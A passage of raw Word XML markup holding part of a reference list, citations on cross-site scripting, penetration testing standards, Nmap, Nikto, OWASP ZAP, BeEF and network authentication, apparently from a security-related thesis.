          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">M. Ziegler and M. Ziegler, “Cross-Site-Scripting (XSS),” in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Web Hacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2014.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3493EBA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[96]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">A. A. Raya, J. B. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Alis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, E. G. Herrero, and A. O. Diaz-Pabón, “Cross-Site Scripting,” in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Innovations in SMEs and Conducting E-Business</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2011.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C5179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[97]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">S. Gupta and B. B. Gupta, “Cross-Site Scripting (XSS) attacks and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> mechanisms: classification and state-of-the-art,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>International Journal of Systems Assurance Engineering and Management</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.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10.1007/s13198-015-0376-0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09273AE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[98]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">E. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kirda</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, N. Jovanovic, C. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Kruegel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and G. Vigna, “Client-side cross-site scripting protection,” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Comput</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Secur</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2009,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10.1016/j.cose.2009.04.008.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410C509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[99]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">N. Chris, K. David, and C. J. R. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, “The Penetration Testing Execution Standard,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2014</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2009.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107D91E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[100]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">C. Nickerson, D. Kennedy, and C. J. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Reil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, “The Penetration Testing Execution Standard,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2014</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2017.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C53BA0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[101]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">D. R. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Bouquin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, “GitHub,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Journal of the Medical Library Association</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. 2015,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10.3163/1536-5050.103.3.019.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7313F68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[102]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">B. Middleton, “Nmap,” in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Conducting Network Penetration and Espionage in a Global Environment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2014.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE5996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[103]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">G. Lyon, “Nmap: the Network Mapper - Free Security Scanner,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://nmap.org/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2017. .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063A9761"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[104]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">C. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sullo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and D. Lodge, “Nikto2,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CIRT.net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2016. .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CE15FE"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[105]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">P. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Engebretson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, “Web-Based Exploitation,” in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The Basics of Hacking and Penetration Testing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2011.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2E7C2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[106]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">OWASP, “OWASP Zed Attack Proxy Project,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Zed Attack Proxy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Proj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2016.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5CC31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[107]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>B. Project, “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BeEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - The Browser Exploitation Framework Project,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Beefproject.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2012. .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B47584"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[108]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">J. C. Foster, V. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Osipov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, N. Bhalla, N. Heinen, and D. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Aitel</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cURL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Buffer Overflow on Linux,” in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Buffer Overflow Attacks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2005.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260CF29D"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[109]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Hacking Security Researchers, “Web Application Penetration Testing with curl - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Hacking Reviews,” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hacking.reveiws</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2020. [Online]. Available: https://www.hacking.reviews/2017/08/web-application-penetration-testing.html?m=1. [Accessed: 11-May-2020].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C44A93"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[110]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Microsoft, “FQDN - Naming Conventions - Windows applications | Microsoft Docs,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>microsoft.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2018. [Online]. Available: https://docs.microsoft.com/en-us/windows/desktop/dns/naming-conventions#fully-qualified-domain-name. [Accessed: 22-Jan-2019].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6DD110"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[111]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">M. Cobb, “Using Nmap to scan for open ports, updated servers and more,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ComputerWeekly.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2009. .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FA4B4C"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[112]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">D. R. Mauro and K. J. Schmidt, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Essential SNMP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. 2005.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A277F72"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[113]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Gartner.com, “Mobile Device Management (MDM) - Gartner IT Glossary,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gartner.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2017. [Online]. Available: https://www.gartner.com/it-glossary/mobile-device-management-mdm. [Accessed: 11-Dec-2017].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18511447"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[114]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">meraki.com, “RADIUS Authentication with WPA2-Enterprise - Cisco Meraki,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>meraki.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 2017. [Online]. Available: https://documentation.meraki.com/MR/Encryption_and_Authentication/Configuring_RADIUS_Authentication_with_WPA2-Enterprise. [Accessed: 11-Dec-2017].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7983B5CA"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[115]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>security.techtarget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, “What is AAA server (authentication, authorization, and accounting)? - Definition from WhatIs.com,” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
